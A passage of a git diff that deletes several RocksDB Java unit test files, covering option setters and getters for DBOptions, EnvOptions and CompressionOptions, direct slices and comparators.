-        // Get last one
-        rocksIterator.seekToLast();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc1".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc1".getBytes());
-        // Will be invalid because abc is after abc1
-        rocksIterator.seek("abc".getBytes());
-        assertThat(rocksIterator.isValid()).isFalse();
-        // Will be abc3 because the next one after abc999
-        // is abc3
-        rocksIterator.seek("abc999".getBytes());
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc3".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc3".getBytes());
-      }
-    }
-  }
-
-  @Test
-  public void builtinComparatorEnum(){
-    assertThat(BuiltinComparator.BYTEWISE_COMPARATOR.ordinal())
-        .isEqualTo(0);
-    assertThat(
-        BuiltinComparator.REVERSE_BYTEWISE_COMPARATOR.ordinal())
-        .isEqualTo(1);
-    assertThat(BuiltinComparator.values().length).isEqualTo(2);
-    assertThat(BuiltinComparator.valueOf("BYTEWISE_COMPARATOR")).
-        isEqualTo(BuiltinComparator.BYTEWISE_COMPARATOR);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionOptionsTest.java
deleted file mode 100644
index c49224c..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionOptionsTest.java
+++ /dev/null
@@ -1,53 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CompressionOptionsTest {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Test
-  public void windowBits() {
-    final int windowBits = 7;
-    try(final CompressionOptions opt = new CompressionOptions()) {
-      opt.setWindowBits(windowBits);
-      assertThat(opt.windowBits()).isEqualTo(windowBits);
-    }
-  }
-
-  @Test
-  public void level() {
-    final int level = 6;
-    try(final CompressionOptions opt = new CompressionOptions()) {
-      opt.setLevel(level);
-      assertThat(opt.level()).isEqualTo(level);
-    }
-  }
-
-  @Test
-  public void strategy() {
-    final int strategy = 2;
-    try(final CompressionOptions opt = new CompressionOptions()) {
-      opt.setStrategy(strategy);
-      assertThat(opt.strategy()).isEqualTo(strategy);
-    }
-  }
-
-  @Test
-  public void maxDictBytes() {
-    final int maxDictBytes = 999;
-    try(final CompressionOptions opt = new CompressionOptions()) {
-      opt.setMaxDictBytes(maxDictBytes);
-      assertThat(opt.maxDictBytes()).isEqualTo(maxDictBytes);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionTypesTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionTypesTest.java
deleted file mode 100644
index e26cc0a..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionTypesTest.java
+++ /dev/null
@@ -1,20 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-
-public class CompressionTypesTest {
-  @Test
-  public void getCompressionType() {
-    for (final CompressionType compressionType : CompressionType.values()) {
-      String libraryName = compressionType.getLibraryName();
-      compressionType.equals(CompressionType.getCompressionType(
-          libraryName));
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DBOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DBOptionsTest.java
deleted file mode 100644
index 11b7435..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DBOptionsTest.java
+++ /dev/null
@@ -1,637 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import java.nio.file.Paths;
-import java.util.*;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class DBOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  public static final Random rand = PlatformRandomHelper.
-      getPlatformSpecificRandomFactory();
-
-  @Test
-  public void getDBOptionsFromProps() {
-    // setup sample properties
-    final Properties properties = new Properties();
-    properties.put("allow_mmap_reads", "true");
-    properties.put("bytes_per_sync", "13");
-    try(final DBOptions opt = DBOptions.getDBOptionsFromProps(properties)) {
-      assertThat(opt).isNotNull();
-      assertThat(String.valueOf(opt.allowMmapReads())).
-          isEqualTo(properties.get("allow_mmap_reads"));
-      assertThat(String.valueOf(opt.bytesPerSync())).
-          isEqualTo(properties.get("bytes_per_sync"));
-    }
-  }
-
-  @Test
-  public void failDBOptionsFromPropsWithIllegalValue() {
-    // setup sample properties
-    final Properties properties = new Properties();
-    properties.put("tomato", "1024");
-    properties.put("burger", "2");
-    try(final DBOptions opt = DBOptions.getDBOptionsFromProps(properties)) {
-      assertThat(opt).isNull();
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failDBOptionsFromPropsWithNullValue() {
-    try(final DBOptions opt = DBOptions.getDBOptionsFromProps(null)) {
-      //no-op
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failDBOptionsFromPropsWithEmptyProps() {
-    try(final DBOptions opt = DBOptions.getDBOptionsFromProps(
-        new Properties())) {
-      //no-op
-    }
-  }
-
-  @Test
-  public void linkageOfPrepMethods() {
-    try (final DBOptions opt = new DBOptions()) {
-      opt.optimizeForSmallDb();
-    }
-  }
-
-  @Test
-  public void env() {
-    try (final DBOptions opt = new DBOptions();
-         final Env env = Env.getDefault()) {
-      opt.setEnv(env);
-      assertThat(opt.getEnv()).isSameAs(env);
-    }
-  }
-
-  @Test
-  public void setIncreaseParallelism() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int threads = Runtime.getRuntime().availableProcessors() * 2;
-      opt.setIncreaseParallelism(threads);
-    }
-  }
-
-  @Test
-  public void createIfMissing() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setCreateIfMissing(boolValue);
-      assertThat(opt.createIfMissing()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void createMissingColumnFamilies() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setCreateMissingColumnFamilies(boolValue);
-      assertThat(opt.createMissingColumnFamilies()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void errorIfExists() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setErrorIfExists(boolValue);
-      assertThat(opt.errorIfExists()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void paranoidChecks() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setParanoidChecks(boolValue);
-      assertThat(opt.paranoidChecks()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxTotalWalSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxTotalWalSize(longValue);
-      assertThat(opt.maxTotalWalSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxOpenFiles() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxOpenFiles(intValue);
-      assertThat(opt.maxOpenFiles()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxFileOpeningThreads() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxFileOpeningThreads(intValue);
-      assertThat(opt.maxFileOpeningThreads()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void useFsync() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseFsync(boolValue);
-      assertThat(opt.useFsync()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dbPaths() {
-    final List<DbPath> dbPaths = new ArrayList<>();
-    dbPaths.add(new DbPath(Paths.get("/a"), 10));
-    dbPaths.add(new DbPath(Paths.get("/b"), 100));
-    dbPaths.add(new DbPath(Paths.get("/c"), 1000));
-
-    try(final DBOptions opt = new DBOptions()) {
-      assertThat(opt.dbPaths()).isEqualTo(Collections.emptyList());
-
-      opt.setDbPaths(dbPaths);
-
-      assertThat(opt.dbPaths()).isEqualTo(dbPaths);
-    }
-  }
-
-  @Test
-  public void dbLogDir() {
-    try(final DBOptions opt = new DBOptions()) {
-      final String str = "path/to/DbLogDir";
-      opt.setDbLogDir(str);
-      assertThat(opt.dbLogDir()).isEqualTo(str);
-    }
-  }
-
-  @Test
-  public void walDir() {
-    try(final DBOptions opt = new DBOptions()) {
-      final String str = "path/to/WalDir";
-      opt.setWalDir(str);
-      assertThat(opt.walDir()).isEqualTo(str);
-    }
-  }
-
-  @Test
-  public void deleteObsoleteFilesPeriodMicros() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setDeleteObsoleteFilesPeriodMicros(longValue);
-      assertThat(opt.deleteObsoleteFilesPeriodMicros()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void baseBackgroundCompactions() {
-    try (final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setBaseBackgroundCompactions(intValue);
-      assertThat(opt.baseBackgroundCompactions()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBackgroundCompactions() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxBackgroundCompactions(intValue);
-      assertThat(opt.maxBackgroundCompactions()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxSubcompactions() {
-    try (final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxSubcompactions(intValue);
-      assertThat(opt.maxSubcompactions()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBackgroundFlushes() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxBackgroundFlushes(intValue);
-      assertThat(opt.maxBackgroundFlushes()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxLogFileSize() throws RocksDBException {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxLogFileSize(longValue);
-      assertThat(opt.maxLogFileSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void logFileTimeToRoll() throws RocksDBException {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setLogFileTimeToRoll(longValue);
-      assertThat(opt.logFileTimeToRoll()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void keepLogFileNum() throws RocksDBException {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setKeepLogFileNum(longValue);
-      assertThat(opt.keepLogFileNum()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void recycleLogFileNum() throws RocksDBException {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setRecycleLogFileNum(longValue);
-      assertThat(opt.recycleLogFileNum()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxManifestFileSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxManifestFileSize(longValue);
-      assertThat(opt.maxManifestFileSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void tableCacheNumshardbits() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setTableCacheNumshardbits(intValue);
-      assertThat(opt.tableCacheNumshardbits()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void walSizeLimitMB() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWalSizeLimitMB(longValue);
-      assertThat(opt.walSizeLimitMB()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void walTtlSeconds() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWalTtlSeconds(longValue);
-      assertThat(opt.walTtlSeconds()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void manifestPreallocationSize() throws RocksDBException {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setManifestPreallocationSize(longValue);
-      assertThat(opt.manifestPreallocationSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void useDirectReads() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseDirectReads(boolValue);
-      assertThat(opt.useDirectReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void useDirectIoForFlushAndCompaction() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseDirectIoForFlushAndCompaction(boolValue);
-      assertThat(opt.useDirectIoForFlushAndCompaction()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowFAllocate() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowFAllocate(boolValue);
-      assertThat(opt.allowFAllocate()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowMmapReads() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowMmapReads(boolValue);
-      assertThat(opt.allowMmapReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowMmapWrites() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowMmapWrites(boolValue);
-      assertThat(opt.allowMmapWrites()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void isFdCloseOnExec() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setIsFdCloseOnExec(boolValue);
-      assertThat(opt.isFdCloseOnExec()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void statsDumpPeriodSec() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setStatsDumpPeriodSec(intValue);
-      assertThat(opt.statsDumpPeriodSec()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void adviseRandomOnOpen() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAdviseRandomOnOpen(boolValue);
-      assertThat(opt.adviseRandomOnOpen()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dbWriteBufferSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setDbWriteBufferSize(longValue);
-      assertThat(opt.dbWriteBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void accessHintOnCompactionStart() {
-    try(final DBOptions opt = new DBOptions()) {
-      final AccessHint accessHint = AccessHint.SEQUENTIAL;
-      opt.setAccessHintOnCompactionStart(accessHint);
-      assertThat(opt.accessHintOnCompactionStart()).isEqualTo(accessHint);
-    }
-  }
-
-  @Test
-  public void newTableReaderForCompactionInputs() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setNewTableReaderForCompactionInputs(boolValue);
-      assertThat(opt.newTableReaderForCompactionInputs()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void compactionReadaheadSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setCompactionReadaheadSize(longValue);
-      assertThat(opt.compactionReadaheadSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void randomAccessMaxBufferSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setRandomAccessMaxBufferSize(longValue);
-      assertThat(opt.randomAccessMaxBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void writableFileMaxBufferSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWritableFileMaxBufferSize(longValue);
-      assertThat(opt.writableFileMaxBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void useAdaptiveMutex() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseAdaptiveMutex(boolValue);
-      assertThat(opt.useAdaptiveMutex()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void bytesPerSync() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setBytesPerSync(longValue);
-      assertThat(opt.bytesPerSync()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void walBytesPerSync() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWalBytesPerSync(longValue);
-      assertThat(opt.walBytesPerSync()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void enableThreadTracking() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setEnableThreadTracking(boolValue);
-      assertThat(opt.enableThreadTracking()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void delayedWriteRate() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setDelayedWriteRate(longValue);
-      assertThat(opt.delayedWriteRate()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void allowConcurrentMemtableWrite() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowConcurrentMemtableWrite(boolValue);
-      assertThat(opt.allowConcurrentMemtableWrite()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void enableWriteThreadAdaptiveYield() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setEnableWriteThreadAdaptiveYield(boolValue);
-      assertThat(opt.enableWriteThreadAdaptiveYield()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void writeThreadMaxYieldUsec() {
-    try (final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteThreadMaxYieldUsec(longValue);
-      assertThat(opt.writeThreadMaxYieldUsec()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void writeThreadSlowYieldUsec() {
-    try (final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteThreadSlowYieldUsec(longValue);
-      assertThat(opt.writeThreadSlowYieldUsec()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void skipStatsUpdateOnDbOpen() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setSkipStatsUpdateOnDbOpen(boolValue);
-      assertThat(opt.skipStatsUpdateOnDbOpen()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void walRecoveryMode() {
-    try (final DBOptions opt = new DBOptions()) {
-      for (final WALRecoveryMode walRecoveryMode : WALRecoveryMode.values()) {
-        opt.setWalRecoveryMode(walRecoveryMode);
-        assertThat(opt.walRecoveryMode()).isEqualTo(walRecoveryMode);
-      }
-    }
-  }
-
-  @Test
-  public void allow2pc() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllow2pc(boolValue);
-      assertThat(opt.allow2pc()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void rowCache() {
-    try (final DBOptions opt = new DBOptions()) {
-      assertThat(opt.rowCache()).isNull();
-
-      try(final Cache lruCache = new LRUCache(1000)) {
-        opt.setRowCache(lruCache);
-        assertThat(opt.rowCache()).isEqualTo(lruCache);
-      }
-
-      try(final Cache clockCache = new ClockCache(1000)) {
-        opt.setRowCache(clockCache);
-        assertThat(opt.rowCache()).isEqualTo(clockCache);
-      }
-    }
-  }
-
-  @Test
-  public void failIfOptionsFileError() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setFailIfOptionsFileError(boolValue);
-      assertThat(opt.failIfOptionsFileError()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dumpMallocStats() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setDumpMallocStats(boolValue);
-      assertThat(opt.dumpMallocStats()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void avoidFlushDuringRecovery() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAvoidFlushDuringRecovery(boolValue);
-      assertThat(opt.avoidFlushDuringRecovery()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void avoidFlushDuringShutdown() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAvoidFlushDuringShutdown(boolValue);
-      assertThat(opt.avoidFlushDuringShutdown()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void rateLimiter() {
-    try(final DBOptions options = new DBOptions();
-        final DBOptions anotherOptions = new DBOptions();
-        final RateLimiter rateLimiter = new RateLimiter(1000, 100 * 1000, 1)) {
-      options.setRateLimiter(rateLimiter);
-      // Test with parameter initialization
-      anotherOptions.setRateLimiter(
-          new RateLimiter(1000));
-    }
-  }
-
-  @Test
-  public void statistics() {
-    try(final DBOptions options = new DBOptions()) {
-      final Statistics statistics = options.statistics();
-      assertThat(statistics).isNull();
-    }
-
-    try(final Statistics statistics = new Statistics();
-        final DBOptions options = new DBOptions().setStatistics(statistics);
-        final Statistics stats = options.statistics()) {
-      assertThat(stats).isNotNull();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectComparatorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectComparatorTest.java
deleted file mode 100644
index 9b593d0..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectComparatorTest.java
+++ /dev/null
@@ -1,52 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.io.IOException;
-import java.nio.file.FileSystems;
-
-public class DirectComparatorTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void directComparator() throws IOException, RocksDBException {
-
-    final AbstractComparatorTest comparatorTest = new AbstractComparatorTest() {
-      @Override
-      public AbstractComparator getAscendingIntKeyComparator() {
-        return new DirectComparator(new ComparatorOptions()) {
-
-          @Override
-          public String name() {
-            return "test.AscendingIntKeyDirectComparator";
-          }
-
-          @Override
-          public int compare(final DirectSlice a, final DirectSlice b) {
-            final byte ax[] = new byte[4], bx[] = new byte[4];
-            a.data().get(ax);
-            b.data().get(bx);
-            return compareIntKeys(ax, bx);
-          }
-        };
-      }
-    };
-
-    // test the round-tripability of keys written and read with the DirectComparator
-    comparatorTest.testRoundtrip(FileSystems.getDefault().getPath(
-        dbFolder.getRoot().getAbsolutePath()));
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectSliceTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectSliceTest.java
deleted file mode 100644
index 48ae52a..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectSliceTest.java
+++ /dev/null
@@ -1,93 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import java.nio.ByteBuffer;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class DirectSliceTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void directSlice() {
-    try(final DirectSlice directSlice = new DirectSlice("abc");
-        final DirectSlice otherSlice = new DirectSlice("abc")) {
-      assertThat(directSlice.toString()).isEqualTo("abc");
-      // clear first slice
-      directSlice.clear();
-      assertThat(directSlice.toString()).isEmpty();
-      // get first char in otherslice
-      assertThat(otherSlice.get(0)).isEqualTo("a".getBytes()[0]);
-      // remove prefix
-      otherSlice.removePrefix(1);
-      assertThat(otherSlice.toString()).isEqualTo("bc");
-    }
-  }
-
-  @Test
-  public void directSliceWithByteBuffer() {
-    final byte[] data = "Some text".getBytes();
-    final ByteBuffer buffer = ByteBuffer.allocateDirect(data.length + 1);
-    buffer.put(data);
-    buffer.put(data.length, (byte)0);
-
-    try(final DirectSlice directSlice = new DirectSlice(buffer)) {
-      assertThat(directSlice.toString()).isEqualTo("Some text");
-    }
-  }
-
-  @Test
-  public void directSliceWithByteBufferAndLength() {
-    final byte[] data = "Some text".getBytes();
-    final ByteBuffer buffer = ByteBuffer.allocateDirect(data.length);
-    buffer.put(data);
-    try(final DirectSlice directSlice = new DirectSlice(buffer, 4)) {
-      assertThat(directSlice.toString()).isEqualTo("Some");
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void directSliceInitWithoutDirectAllocation() {
-    final byte[] data = "Some text".getBytes();
-    final ByteBuffer buffer = ByteBuffer.wrap(data);
-    try(final DirectSlice directSlice = new DirectSlice(buffer)) {
-      //no-op
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void directSlicePrefixInitWithoutDirectAllocation() {
-    final byte[] data = "Some text".getBytes();
-    final ByteBuffer buffer = ByteBuffer.wrap(data);
-    try(final DirectSlice directSlice = new DirectSlice(buffer, 4)) {
-      //no-op
-    }
-  }
-
-  @Test
-  public void directSliceClear() {
-    try(final DirectSlice directSlice = new DirectSlice("abc")) {
-      assertThat(directSlice.toString()).isEqualTo("abc");
-      directSlice.clear();
-      assertThat(directSlice.toString()).isEmpty();
-      directSlice.clear();  // make sure we don't double-free
-    }
-  }
-
-  @Test
-  public void directSliceRemovePrefix() {
-    try(final DirectSlice directSlice = new DirectSlice("abc")) {
-      assertThat(directSlice.toString()).isEqualTo("abc");
-      directSlice.removePrefix(1);
-      assertThat(directSlice.toString()).isEqualTo("bc");
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/EnvOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/EnvOptionsTest.java
deleted file mode 100644
index 9933b1e..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/EnvOptionsTest.java
+++ /dev/null
@@ -1,133 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import java.util.Random;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class EnvOptionsTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource = new RocksMemoryResource();
-
-  public static final Random rand = PlatformRandomHelper.getPlatformSpecificRandomFactory();
-
-  @Test
-  public void useMmapReads() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setUseMmapReads(boolValue);
-      assertThat(envOptions.useMmapReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void useMmapWrites() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setUseMmapWrites(boolValue);
-      assertThat(envOptions.useMmapWrites()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void useDirectReads() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setUseDirectReads(boolValue);
-      assertThat(envOptions.useDirectReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void useDirectWrites() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setUseDirectWrites(boolValue);
-      assertThat(envOptions.useDirectWrites()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowFallocate() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setAllowFallocate(boolValue);
-      assertThat(envOptions.allowFallocate()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void setFdCloexecs() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setSetFdCloexec(boolValue);
